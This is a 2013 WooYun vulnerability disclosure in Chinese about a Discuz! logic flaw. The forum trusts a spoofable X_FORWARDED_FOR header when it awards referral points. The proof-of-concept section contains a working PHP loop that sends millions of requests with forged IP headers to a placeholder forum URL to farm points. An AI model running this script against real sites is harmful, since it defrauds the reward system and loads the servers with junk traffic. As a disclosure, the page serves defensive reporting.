当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-036693

漏洞标题:Discuz推广功能任意刷分

相关厂商:Discuz!

漏洞作者: 大肠精

提交时间:2013-09-17 11:02

修复时间:2013-09-22 11:02

公开时间:2013-09-22 11:02

漏洞类型:设计缺陷/逻辑错误

危害等级:中

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-17: 细节已通知厂商并且等待厂商处理中
2013-09-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

DZ的访问加分的推广功能存在缺陷

详细说明:

dz.jpg


这里是定义IP的地方

dz1.jpg


当X_FORWARDED_FOR头存在并且不为那几种情况时使用这个作为IP地址
因为推广积分是跟访问IP有关的,所以只要修改X_FORWARDED_FOR就可以任意刷积分了

漏洞证明:

<?php
function inj($ip)
{
$optionget = stream_context_create(array('http' => array('method' => "GET",'ignore_errors'=>true, 'header' => "X_FORWARDED_FOR: $ip")));
$url = "http://www.xxx.com/forum.php?fromuid=3007";
$contents = file_get_contents($url,false,$optionget);
return $contents;
}
for($i=0;$i<255;$i++)for($j=0;$j<255;$j++)for($k=0;$k<255;$k++)inj("111.$i.$j.$k");
?>

修复方案:

null

版权声明:转载请注明来源 大肠精@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-09-22 11:02

厂商回复:

最新状态:

暂无